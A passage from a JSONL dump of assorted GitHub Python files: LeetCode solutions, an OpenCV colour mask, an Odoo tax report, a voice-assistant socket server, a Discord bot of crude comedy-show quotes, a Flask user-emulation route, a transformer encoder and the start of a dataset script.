distance: int) -> int:\n # 返回当前结点的所有子节点高度(小于 distance)\n def dfs(node, distance):\n if not node: return [] # 节点为 null,返回空数组\n if not node.left and not node.right: return [1] # 节点为叶子节点,那么对于上一层来说,该叶子节点高度为 1\n \n # 左叶子节点高度和右叶子节点高度\n leftHeights = dfs(node.left, distance)\n rightHeights = dfs(node.right, distance)\n \n # 找到所有 左高度+右高度<=distance 的组合个数\n self.res += sum([l + r <= distance for l in leftHeights for r in rightHeights])\n \n # 对于上一层,高度要 + 1\n return [n + 1 for n in leftHeights + rightHeights if n + 1 < distance]\n \n dfs(root, distance)\n return self.res\n\n\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.left.right = TreeNode(5)\nroot.right.left = TreeNode(6)\nroot.right.right = TreeNode(7)\n\n\ndistance = 3\nres = Solution().countPairs(root, distance)\nprint(res)\n","repo_name":"lonely7yk/LeetCode_py","sub_path":"LeetCode1000/LeetCode1530NumberofGoodLeafNodesPairs.py","file_name":"LeetCode1530NumberofGoodLeafNodesPairs.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"31201141869","text":"\"\"\"\nFilesystem\n==========\n\nAutomatic waveform retrieval for your local SDS archive.\n\n\"\"\"\nfrom pyvdms import waveforms2SDS\nimport os\n\n###############################################################################\n# waveforms2SDS\n# -------------\n\n# Automatically download waveforms per day and add them to the SDS archive. If\n# waveforms for a specifc station and channel already exist then these are\n# skipped. If your SDS archive contains gaps then first the status will be\n# requested. If no status information is returned and the gap length exceeds\n# the ``force_request`` threshold then the entire day will be (re-) downloaded.\n\nos.makedirs('../../data', exist_ok=True)\n\nresp = waveforms2SDS(\n station='I18*',\n channel='*',\n starttime='2020-02-02',\n endtime='2020-02-05',\n sds_root='../../data',\n threshold=60.,\n request_limit='2GB',\n # debug=True,\n)\n\nif resp.success:\n\n if resp.completed:\n\n print('Request completed.')\n\n elif resp.quota_exceeded:\n\n print(f'Quota limit exceeded. Continue from {resp.time} onwards.')\n\nelse:\n\n print(f'An error occurred during the request:\\n{resp.error}')\n","repo_name":"psmsmets/PyVDMS","sub_path":"examples/filesystem/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"73924180650","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nif not cap.isOpened():\n cap.open()\n\n#img = cv2.imread(\"C:\\\\Users\\\\HP\\\\Desktop\\\\Aly\\\\C.jpg\", cv2.IMREAD_GRAYSCALE)\nwhile(1):\n ret, frame = cap.read()\n\n if not ret:\n print(\"Could not get frame\")\n\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n green_lower = np.array([50, 50, 50])\n green_upper = np.array([70, 255, 255])\n\n # green_lower = np.array([255, 40, 255])\n # green_upper = np.array([255, 255, 255])\n\n mask = cv2.inRange(hsv_frame, green_lower, green_upper)\n\n res = cv2.bitwise_and(frame, frame, mask=mask)\n\n cv2.imshow('original', frame)\n #cv2.imshow('masked', mask)\n cv2.imshow('res', res)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"laksh-21/Image-Processing","sub_path":"Color Detection/Color detection.py","file_name":"Color detection.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"6381784299","text":"class Solution(object):\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n res = self.part(nums)\n return res\n def part(self,nums):\n if len(nums)==1:\n return nums[0]\n else:\n half = len(nums)//2\n a,b = nums[:len(nums)//2],nums[len(nums)//2:]\n res1,res2 = self.part(a),self.part(b)\n lmax = nums[half-1]\n su =nums[half-1]\n for i in range(half-2,-1,-1):\n su+=nums[i]\n lmax = max(lmax,su)\n rmax = nums[half]\n su =nums[half]\n for i in range(half+1,len(nums)):\n su+=nums[i]\n rmax = max(rmax,su)\n return max(res1,res2,rmax+lmax)\n\nsol = Solution()\nprint(sol.maxSubArray([1,1]))\n","repo_name":"tongbc/algorithm","sub_path":"src/justForReal/Maximum_Subarray.py","file_name":"Maximum_Subarray.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"4131421767","text":"\ndef change_of_basis(X, W):\n \"\"\"\n Projects data onto new basis W.\n\n Args:\n X (numpy array of floats) : Data matrix each column corresponding to a\n different random variable\n W (numpy array of floats) : new orthonormal basis columns correspond to\n basis vectors\n\n Returns:\n (numpy array of floats) : Data matrix expressed in new basis\n \"\"\"\n\n # Project data onto new basis described by W\n Y = X @ W\n\n return Y\n\n\n# Project data to new basis\nY = change_of_basis(X, W)\n\n# Visualize\nwith plt.xkcd():\n plot_data_new_basis(Y)","repo_name":"NeuromatchAcademy/course-content","sub_path":"tutorials/W1D4_DimensionalityReduction/solutions/W1D4_Tutorial1_Solution_80a5f41b.py","file_name":"W1D4_Tutorial1_Solution_80a5f41b.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":2510,"dataset":"github-code","pt":"55"} +{"seq_id":"17795674946","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nimport time\nfrom io import BytesIO\nimport xlsxwriter\n\n\nclass wizard_report_tax(models.TransientModel):\n _name = 'wizard.report.tax'\n\n branch_id = fields.Many2one('res.company', string='Branch')\n date_from = fields.Date('Star Date')\n date_to = fields.Date('End Date')\n print_type = fields.Selection([('dt', 'Detail'),('sum', 'Summary')], string='Print Type', default='dt')\n output_type = fields.Selection([('pdf', 'PDF'),('xlsx', 'Excel')], string='Output Type', default='pdf', required=True)\n\n @api.multi\n def generate_report(self):\n self.ensure_one()\n data = {}\n data['ids'] = self.env.context.get('active_ids', [])\n data['model'] = self.env.context.get('active_model', 'ir.ui.menu')\n data['form'] = self.read(['date_from', 'date_to', 'branch_id', 'output_type'])[0]\n result = {}\n if data['form']:\n if data['form']['output_type'] == 'pdf':\n result = self.env.ref('ac_account_thai.wizard_report_tax').report_action(self, data=data)\n if data['form']['output_type'] == 'xlsx':\n result = self.env.ref('ac_account_thai.wizard_xlsx_tax').report_action(self, data=data)\n return result\n\n\nclass report_tax(models.AbstractModel):\n #_inherit = 'report.account.report_tax'\n _name = 'report.ac_account_thai.report_tax'\n\n @api.multi\n def get_report_values(self, docids, data=None):\n if not data.get('form'):\n raise UserError(_(\"Form content is missing, this report cannot be printed.\"))\n\n result = self.get_data(data['form'])\n data.update(result)\n return data\n\n @api.multi\n def get_data(self, data):\n branch_id = data['branch_id'][0] if data['branch_id'] else False\n\n date_from = data['date_from'] or False\n date_to = data['date_to'] or False\n\n filters = []\n if branch_id:\n filters.append(('branch_id','=',branch_id))\n if date_from:\n filters.append(('date','>=',date_from))\n if date_to:\n filters.append(('date','<=',date_to))\n\n filters.append(('state','=','open'))\n filters.append(('tax_group','=','vat'))\n filters.append(('move_id','!=',False))\n #filters.append(('type_tax_use','=','purchase'))\n #filters.append(('type_tax_use','=','sale'))\n\n docids = self.env['account.tax.line'].search(filters, order=\"type_tax_use, tax_id, date\")\n\n group = {}\n # [(o.id, o.company_id, o.branch_id, o.tax_id, o.type_tax_use) for o in docids]\n for obj in docids:\n key = obj.type_tax_use, obj.tax_id\n if key in group:\n group[key]['base'] += obj.base\n group[key]['amount'] += obj.amount\n group[key]['count'] += 1\n else:\n group[key] = {\n 'tax_id': obj.tax_id ,\n 'base': obj.base ,\n 'amount': obj.amount ,\n 'count': 1 ,\n }\n\n lines = []\n for o in group:\n line = {\n 'group': o[0] ,\n 'tax_id': group[o]['tax_id'] ,\n 'base': group[o]['base'] ,\n 'amount': group[o]['amount'] ,\n 'count': group[o]['count'] ,\n }\n lines.append(line)\n\n\n result = {'data': data, 'docids': docids, 'lines': lines, }\n return result\n\n\nclass xlsx_tax(models.AbstractModel):\n _name = 'report.ac_account_thai.xlsx_tax'\n\n @api.multi\n def create_xlsx_report(self, docids, data):\n data = self.get_report_values(docids, data)\n file_data, workbook = self.get_workbook()\n workbook = self.generate_xlsx_report(workbook, data)\n return self.get_workbook_read(file_data, workbook)\n\n @api.multi\n def get_workbook(self):\n file_data = BytesIO()\n workbook = xlsxwriter.Workbook(file_data, self.get_workbook_options())\n return file_data, workbook\n\n @api.multi\n def get_workbook_options(self):\n result = {'in_memory': True, 'encoding':'UTF-8'}\n return result\n\n @api.multi\n def get_workbook_read(self, file_data, workbook):\n workbook.close()\n file_data.seek(0)\n return file_data.read(), 'xlsx'\n\n @api.multi\n def get_report_values(self, docids, data=None):\n data['ids'] = self.env.context.get('active_ids', [])\n data['model'] = self.env.context.get('active_model', 'ir.ui.menu')\n objs = self.env['wizard.report.tax'].browse(docids)\n data['form'] = objs.read(['date_from', 'date_to', 'branch_id', 'output_type'])[0]\n result = self.env['report.ac_account_thai.report_tax'].get_data(data['form'])\n data.update({'docids':result['docids'],'lines':result['lines'],})\n return data\n\n @api.multi\n def generate_xlsx_report(self, workbook, data):\n docids = data['docids']\n lines = data['lines']\n\n sheet = workbook.add_worksheet() # self.get_report_name()\n workbook, sheet, formats = self.env['report.ac_account_thai.report_xlsx'].get_header_xlsx(workbook, sheet)\n\n sheet.set_column('A:B', 15)\n sheet.set_column('C:D', 20)\n\n sheet.merge_range('A7:D7','Tax Report', formats['title'])\n sdate = ' From ' + time.strftime('%d/%m/%Y',time.strptime(data['form']['date_from'],'%Y-%m-%d')) if data['form']['date_from'] else ''\n edate = ' To ' + time.strftime('%d/%m/%Y',time.strptime(data['form']['date_to'],'%Y-%m-%d')) if data['form']['date_to'] else ''\n sheet.merge_range('A8:D8', sdate + edate, formats['hcenter'])\n\n row = 9\n if data['form']['branch_id']:\n sheet.merge_range('A'+str(row)+':D'+str(row), 'สาขา : ' + data['form']['branch_id'][1], formats['hleft'])\n row += 1\n\n row += 1\n sheet.merge_range('A'+str(row)+':B'+str(row), 'Sale', formats['tleft'])\n sheet.write('C'+str(row), 'Base Amount', formats['tright'])\n sheet.write('D'+str(row), 'Tax Amount', formats['tright'])\n row += 1\n for line in [line for line in lines if line.get('group') == 'sale']:\n sheet.merge_range('A'+str(row)+':B'+str(row), line.get('tax_id').name, formats['left'])\n sheet.write('C'+str(row), line.get('base'), formats['num'])\n sheet.write('D'+str(row), line.get('amount'), formats['num'])\n row += 1\n\n\n row += 1\n sheet.merge_range('A'+str(row)+':B'+str(row), 'Purchase', formats['tleft'])\n sheet.write('C'+str(row), 'Base Amount', formats['tright'])\n sheet.write('D'+str(row), 'Tax Amount', formats['tright'])\n row += 1\n for line in [line for line in lines if line.get('group') == 'purchase']:\n sheet.merge_range('A'+str(row)+':B'+str(row), line.get('tax_id').name, formats['left'])\n sheet.write('C'+str(row), line.get('base'), formats['num'])\n sheet.write('D'+str(row), line.get('amount'), formats['num'])\n row += 1\n\n\n\n return workbook\n\n","repo_name":"mossnana/almacom-modules","sub_path":"addons/addons-internal-11.0/ac_account_thai/wizard/account_report_tax.py","file_name":"account_report_tax.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"42982061426","text":"from Brain.Threading import Threading\nfrom selectors import DefaultSelector, EVENT_READ\nfrom traceback import format_exc\nfrom socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR\n\nimport Global\nfrom Global import get_username, get_language, reformat_lang, ET\n\nfrom Brain.Network import Network, MediaCenter, SystemCenter, NetCenter\nfrom HumanMachineInterface.InputInterface import InputInterface\nfrom HumanMachineInterface.OutputInterface import OutputInterface\nfrom libserver import Message\n\nHOST = \"127.0.0.1\" # localhost\nPORT = 65432\nsel = DefaultSelector()\n\n\ndef wait_for_request():\n while inp.is_listening():\n speech = inp.listen()\n print(speech)\n net.parse_instruction(speech)\n print(\"Stopped waiting for request.\")\n\n\ndef great_user():\n out.set_speech(root.find(\"greeting\").find(reformat_lang(lang)).find(\n \"start\").text + \" \" + user_name + \", \" + root.find(\"greeting\").find(reformat_lang(lang)).find(\"end\").text)\n\n\ndef set_server_for_external_components():\n lsock = socket(AF_INET, SOCK_STREAM)\n # Avoid bind() exception: OSError: [Errno 48] Address already in use\n lsock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n lsock.bind((HOST, PORT))\n lsock.listen()\n print(f\"Listening on {(HOST, PORT)}\")\n lsock.setblocking(False)\n sel.register(lsock, EVENT_READ, data=None)\n try:\n while True:\n events = sel.select(timeout=None)\n for key, mask in events:\n if key.data is None:\n accept_wrapper(key.fileobj)\n else:\n message = key.data\n try:\n message.process_events(mask)\n except Exception:\n print(\n f\"Main: Error: Exception for {message.addr}:\\n\"\n f\"{format_exc()}\"\n )\n message.close()\n except KeyboardInterrupt:\n print(\"Caught keyboard interrupt, exiting\")\n finally:\n sel.close()\n\n\ndef accept_wrapper(sock):\n conn, addr = sock.accept()\n print(f\"Accepted connection from {addr}\")\n conn.setblocking(False)\n message = Message(sel, conn, addr)\n sel.register(conn, EVENT_READ, data=message)\n\n\ntree = ET.parse(\"HumanMachineInterface/StandardSpeech.xml\")\nroot = tree.getroot()\nGlobal.tree = tree\nGlobal.root = root\n\nuser_name = get_username()\nprint(\"Setting up language\")\nlang = get_language() # reformat if isn't called by In/Out interface\nGlobal.lang = lang\nprint(\"Setting up input interface\")\ninp = InputInterface.get_instance(lang)\nprint(\"Setting up output interface\")\nout = OutputInterface.get_instance(lang)\nprint(\"Setting up processing centers\")\nmedia_center = MediaCenter.get_instance(inp, out)\nsystem_center = SystemCenter.get_instance(inp)\nnet_center = NetCenter.get_instance()\n\nprint(\"Setting up central network\")\nnet = Network.get_instance(reformat_lang(lang), media_center, system_center, net_center)\n\nprint(\"Setting up server for external components\")\nThreading.start_thread(name=\"set_server_thread_@alice\",\n target=set_server_for_external_components,\n daemon=True)\n# Great user\nprint(\"We are all set\")\ngreat_user()\n\nThreading.start_thread(name=\"wait_for_request_thread\",\n target=wait_for_request)\n\nout.show()\n\n# Executed when out is closed\n# As it is the main process, all the other threads will exit too as they are daemons.\n# However, the process that listens for new requests is not a daemon. It must be explicitly stopped.\n# If all threads are not stopped, the program will continue to run in the background even if the main\n# process (the Tk window) has exited.\ninp.stop_listening()\n","repo_name":"Axel-NCHO/SU_Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"23705588681","text":"import discord\r\nimport random\r\nfrom discord.ext import commands\r\n\r\nclass CenturionQuotes(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n # Define a list of quotes with their corresponding authors and images\r\n self.quotes = [\r\n {\r\n \"text\": \"I bloody love a good smoothie. It's all the pleasure of eating without the hassle of chewing.\",\r\n \"author\": \"Grumio\",\r\n \"image\": \"https://i.imgur.com/tu6SR5r.png\"\r\n },\r\n {\r\n \"text\": \"It's your tunic, so technically, I'm pissing yourself.\",\r\n \"author\": \"Marcus Phillipus Valerius Gallo\",\r\n \"image\": \"https://i.imgur.com/yPEvKtl.png\"\r\n },\r\n {\r\n \"text\": \"It's Water Man.\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n },\r\n {\r\n \"text\": \"No that's a threesome, two guys can't be a gang can they.\",\r\n \"author\": \"Stylax Rufus Eurisces\",\r\n \"image\": \"https://i.imgur.com/wP7mddn.png\"\r\n },\r\n {\r\n \"text\": \"I saw you earlier, with the.. hairy stick.\",\r\n \"author\": \"Grumio\",\r\n \"image\": \"https://i.imgur.com/tu6SR5r.png\"\r\n },\r\n {\r\n \"text\": \"Do you think it's possible I give herpes to a cat?\",\r\n \"author\": \"Stylax Rufus Eurisces\",\r\n \"image\": \"https://i.imgur.com/wP7mddn.png\"\r\n },\r\n {\r\n \"text\": \"Flavia! Flavia! There's a fucking hand in the jug!\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n },\r\n {\r\n \"text\": \"You're knobbing your cousin, because it's the closest you can get to having sex with yourself.\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n },\r\n {\r\n \"text\": \"Dirty dirty dirty dick, you've got a dirty dick. Urghhhh cousin fucker\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n },\r\n {\r\n \"text\": \"His penis could have eaten my penis for breakfast.\",\r\n \"author\": \"Marcus Phillipus Valerius Gallo\",\r\n \"image\": \"https://i.imgur.com/yPEvKtl.png\"\r\n }, \r\n {\r\n \"text\": \"No actually, on their knees worshipping my rack.\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n }, \r\n {\r\n \"text\": \"I DO NOT HAVE BOOBS!\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n }, \r\n {\r\n \"text\": \"Will you come in with me? Incase the doctor tries to finger me.\",\r\n \"author\": \"Stylax Rufus Eurisces\",\r\n \"image\": \"https://i.imgur.com/wP7mddn.png\"\r\n }, \r\n {\r\n \"text\": \"My name is Stylax, I'm into weird sex, I shag my granny, in her fanny, I kiss my brother, I fuck my mother, and all my uncles 🎵🎵.\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n } \r\n ]\r\n\r\n @commands.command(name=\"quote\")\r\n async def quote(self, ctx):\r\n # Pick a random quote from the list\r\n quote = random.choice(self.quotes)\r\n\r\n # Create an embed with the quote text and author\r\n embed = discord.Embed(title=\"Random Quote\", description=quote[\"text\"], color=0xe91234)\r\n embed.set_footer(text=f\"- {quote['author']}\")\r\n \r\n\r\n # Set the thumbnail to the image of the author\r\n embed.set_thumbnail(url=quote[\"image\"])\r\n\r\n # Send the embed as a message\r\n message = f\"{ctx.author.mention} here's your quote! <:quote:1076922518193053746>\"\r\n await ctx.send(message)\r\n await ctx.send(embed=embed)\r\n await ctx.message.delete()\r\n\r\ndef setup(bot):\r\n bot.add_cog(CenturionQuotes(bot))\r\n","repo_name":"thejopu/Centurion","sub_path":"CenturionQuotes.py","file_name":"CenturionQuotes.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"2552612284","text":"class Solution:\n def numRescueBoats(self, people: List[int], limit: int) -> int:\n people.sort()\n boat = 0\n l, r = 0, len(people) - 1\n while l <= r:\n remain = limit - people[r]\n r -= 1\n boat += 1\n if remain >= people[l]:\n l += 1\n return boat\n ","repo_name":"shivamkchoudhary/LeetCode","sub_path":"0881-boats-to-save-people/0881-boats-to-save-people.py","file_name":"0881-boats-to-save-people.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"55"} +{"seq_id":"70176146092","text":"# goldbach partition\r\nimport sys\r\n\r\nsosu = []\r\ncheck = [0] * 1000001\r\ncheck[0] = 1\r\ncheck[1] = 1\r\n\r\nfor i in range(2, 1000001):\r\n if check[i] == 0:\r\n sosu.append(i)\r\n for j in range(2*i, 1000001, i):\r\n check[j] = 1\r\n\r\nt = int(sys.stdin.readline())\r\n\r\nfor _ in range(t):\r\n cnt = 0\r\n n = int(sys.stdin.readline())\r\n for i in sosu:\r\n if i >= n:\r\n break\r\n if not check[n - i] and i <= n-i: # 순서만 다른거 counting 하지 않기 위해\r\n cnt += 1\r\n print(cnt)\r\n","repo_name":"dayhang/Baekjoon","sub_path":"백준/Silver/17103. 골드바흐 파티션/골드바흐 파티션.py","file_name":"골드바흐 파티션.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"19670389743","text":"#-*- coding:utf-8 -*-\r\nfrom application import app\r\n#\r\nfrom application import db\r\n#\r\nfrom flask import render_template, redirect, url_for, session, request, flash\r\nfrom application.models.schema import *\r\nfrom application.models.player_manager import *\r\nfrom datetime import datetime, timedelta\r\nimport logging\r\n\r\n@app.route('/find',methods=['GET','POST'])\r\ndef find():\r\n\tif request.method=='POST':\r\n\t\ttext=request.form['text']\r\n\t\tusers=find_user(text)\r\n\t\treturn render_template('user_list.html',users=users)\r\n\telse:\r\n\t\treturn render_template('emulate.html')\r\n\r\n@app.route('/emulate/')\r\ndef emulate(user_pk):\r\n\tif session['role']==\"Admin\":\r\n\t\tsession['original_session_pk']=session['user_pk']\r\n\t\tnew_user=Player.query.get(user_pk)\r\n\t\tsession['email']=new_user.email\r\n\t\tsession['username']=new_user.player_name\r\n\t\tsession['user_pk']=new_user.pk\r\n\t\tsession['role']=new_user.role\r\n\t\tsession['team_pk']=new_user.team_pk\r\n\t\tsession['logged_in'] = True\r\n\t\t# logging.debug('바뀌기전')\r\n\t\t# logging.debug(session['original_session_pk'])\r\n\t\t# logging.debug('바뀐후')\r\n\t\t# logging.debug(session['user_pk'])\r\n\t\treturn redirect(url_for('find'))\r\n\telse:\r\n\t\terror=u\"권한이 없습니다.\"\r\n\t\t# logging.debug(session['user_pk'])\r\n\t\treturn render_template('emulate.html',error=error)\t\t\r\n\r\n@app.route('/back_to_original_session')\r\ndef back_to_original_session():\r\n\toriginal=Player.query.get(session['original_session_pk'])\r\n\tsession['email']=original.email\r\n\tsession['username']=original.player_name\r\n\tsession['user_pk']=original.pk\r\n\tsession['role']=original.role\r\n\tsession['team_pk']=original.team_pk\r\n\tsession['logged_in'] = True\r\n\t# logging.debug(session['user_pk'])\r\n\treturn redirect(url_for('find'))","repo_name":"gpfl7846/homepage","sub_path":"application/controllers/emulate.py","file_name":"emulate.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"20913699552","text":"# You are given the integer N and array with 1 and 0 you should find the smalest amount of hops from starting 0 to last 0\n# considered that can move 2 or 1 places in a row and cannot get into position of num 1.\n\nn = int(input())\narr = \"\".join(input().split(\" \"))\ndef clouds(arr):\n hops = 0\n # arr = \"Hello World\"\n while arr:\n try:\n if arr[2] == \"0\":\n hops += 1\n arr = arr[2:] # pretty much the same as previous only here done with a string slicing\n elif arr[1] == \"0\":\n hops += 1\n arr = arr[1:]\n except IndexError:\n if len(arr) > 1:\n if arr[1] == \"0\": # We need to check here again for arr[1]\n hops += 1\n arr = arr[1:]\n continue\n else:\n break\n return hops\n\nprint(clouds(arr))","repo_name":"MarkoShiva/HackerRank","sub_path":"HackerRank/InterviewPreparation/clouds.py","file_name":"clouds.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"74798396972","text":"##Note: Website has a firmware for web scraping, so this did not work\n\nfrom requests_html import HTMLSession\n\nsession = HTMLSession()\n\nheaders = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36'\n}\n\nurl = \"https://usa.ingrammicro.com/Site/home\"\n\nr = session.get(url, headers=headers, payload= {'sessionid':'h-b69e670022969d927cd560740fc0b7a7_t-1638310868'} )\n\nr.html.render(sleep=1, keep_page=True, scrolldown=1)\n\nprint(r.html.html)","repo_name":"Alperencode/BeautifulSoup","sub_path":"UpWork11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"18349984288","text":"#!/usr/bin/python3\n'''\nA function for grid island_perimeter\n'''\n\n\ndef island_perimeter(grid):\n '''\n Returns perimeter of the island described in a grid\n\n The grid represents water by 0 and land by 1.\n\n Args:\n grid (list): A list of lists of integers\n '''\n grid_width = len(grid[0])\n grid_height = len(grid)\n edges = 0\n perimeter = 0\n\n for i in range(grid_height):\n for j in range(grid_width):\n if grid[i][j] == 1:\n perimeter += 1\n if (j > 0 and grid[i][j - 1] == 1):\n edges += 1\n if (i > 0 and grid[i - 1][j] == 1):\n edges += 1\n return perimeter * 4 - edges * 2\n","repo_name":"itsoluwatobby/alx-low_level_programming","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"2620696305","text":"from typing import List\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def level_order(self, root: TreeNode) -> List[List[int]]:\n if root is None:\n return []\n result = []\n queue = [[root]]\n while queue:\n nodes = queue.pop(0)\n parcial = []\n level = []\n for node in nodes:\n level.append(node.val)\n if node.left is not None:\n parcial.append(node.left)\n if node.right is not None:\n parcial.append(node.right)\n result.append(level)\n if parcial:\n queue.append(parcial)\n return result\n","repo_name":"joaojunior/hackerrank","sub_path":"leetcode/binary-tree-level-order-traversal/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"13340911077","text":"import math\nimport torch\nimport torch.nn as nn\n\nfrom videoanalyst.model.utils.transformer_layers import (SpatialPositionEncodingLearned,\n MultiHeadAttention,\n PositionWiseFeedForward)\n\n\nclass EncoderLayer(nn.Module):\n ''' Compose with two layers '''\n\n def __init__(self, d_model, d_inner, n_head, d_k, d_v, dropout=0.1):\n super(EncoderLayer, self).__init__()\n self.slf_attn = nn.MultiheadAttention(embed_dim=d_model, num_heads=n_head, dropout=dropout)\n self.norm = nn.LayerNorm(d_model, eps=1e-6)\n self.pos_ffn = PositionWiseFeedForward(d_model, d_inner, dropout=dropout)\n\n def forward(self, enc_input, mask=None):\n enc_output, enc_slf_attn = self.slf_attn(query=enc_input, key=enc_input, value=enc_input,\n attn_mask=mask)\n enc_output = enc_input + enc_output\n enc_output = self.norm(enc_output)\n\n enc_output = self.pos_ffn(enc_output)\n return enc_output, enc_slf_attn\n\n\nclass Encoder(nn.Module):\n def __init__(self,\n mid_channels_model=256,\n mid_channels_ffn=2048,\n num_heads=8,\n num_layers=8,\n prob_dropout=0.0,\n score_size=33):\n super(Encoder, self).__init__()\n assert mid_channels_model % num_heads == 0\n mid_channels_k = mid_channels_model // num_heads\n mid_channels_v = mid_channels_k\n\n self.spatial_position_encoding = SpatialPositionEncodingLearned(mid_channels_model, score_size)\n # self.dropout = nn.Dropout(p=prob_dropout)\n # self.layer_norm = nn.LayerNorm(mid_channels_model, eps=1e-6)\n self.encoder_layers = nn.ModuleList([\n EncoderLayer(mid_channels_model, mid_channels_ffn, num_heads,\n mid_channels_k, mid_channels_v, dropout=prob_dropout)\n for _ in range(num_layers)])\n\n def forward(self, x):\n # B, C, H, W = x.shape\n x = self.spatial_position_encoding(x)\n\n x = x.view(*x.shape[:2], -1) # B, C, HW\n enc_output = x.permute(2, 0, 1).contiguous() # HW, B, C\n\n # no need of mask if enc_output.shape is (BT, HW, C)\n for enc_layer in self.encoder_layers:\n enc_output, enc_slf_attn = enc_layer(enc_output)\n return enc_output # HW, B, C\n","repo_name":"fzh0917/SparseTT","sub_path":"videoanalyst/model/neck/neck_impl/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"55"} +{"seq_id":"32365739775","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 18 14:35:57 2023\n\n@author: JK-WORK\n\"\"\"\n\nimport os, shutil,sys\nimport subprocess\n\nimport sys, os\npath_to_whatprot_python=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+ '/ext/whatprot/python';\nsys.path.append(path_to_whatprot_python)\nfrom cleave_proteins import cleave_proteins\nfrom dye_seqs_from_peptides import dye_seqs_from_peptides\n\n\ndef erase_contents(folder): #Erase contents of folder\n for filename in os.listdir(folder): ## https://stackoverflow.com/questions/185936/how-to-delete-the-contents-of-a-folder\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\nn_proteins=[20,50,100,200,500,1000,2000,5000,10000];\n#n_proteins=[20000];\n\npath_datasets=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+\"/data/\"\npath_datasets_norm=path_datasets+\"NormDatasets/\"\npath_datasets_long=path_datasets+\"LongDatasets/\"\npath_datasets_common_files= path_datasets +\"common/\"\nprot_fasta=path_datasets_common_files+\"UP000005640_9606.fasta\"\nseq_params_path= path_datasets_common_files + \"seq-params.json\"\n\nn_reads_norm=100000;\nn_reads_long=1000000;\n\n\nif not os.path.isdir(path_datasets_norm):\n os.mkdir(path_datasets_norm)\nif not os.path.isdir(path_datasets_long):\n os.mkdir(path_datasets_long)\n\n##Generate norm 